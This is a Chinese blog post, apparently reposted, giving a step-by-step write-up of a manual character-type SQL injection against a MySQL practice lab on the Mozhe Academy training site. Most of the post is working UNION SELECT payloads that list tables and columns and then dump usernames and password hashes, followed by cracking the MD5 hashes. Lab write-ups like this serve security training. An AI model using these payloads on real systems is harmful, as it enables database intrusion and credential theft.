SQL手工注入漏洞测试(MySQL数据库-字符型) 墨者学院

匿名 (未验证) 提交于 2019-12-02 21:59:42
版权声明:转载请附上原文链接 https://blog.csdn.net/qq_41289254/article/details/89682476

1、打开网页,查看源码,发现停机公告那里有个url,尝试注入一下

2、?id=tingjigonggao'
发现有个函数不满足,会报错,不过既然告诉了是字符型注入,再试一下:
?id=tingjigonggao' and '1'='1
发现成功显示
?id=tingjigonggao' and '1'='2
显示有误

3、判断列数:
?id=' order by 1#
发现不行

4、查看回显位置:
?id=' union select '1','2','3','4

5、?id=' union select '1',database(),user(),'4

6、查询表:
?id=' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() and '1'='1

7、查询字段:
?id=' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member' and '1'='1

8、查询字段值
?id=' union select 1,group_concat(name,password),3,4 from stormgroup_member where '1'='1#

9、将得到的password字段md5解密即得到密码

文章来源: https://blog.csdn.net/qq_41289254/article/details/89682476
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!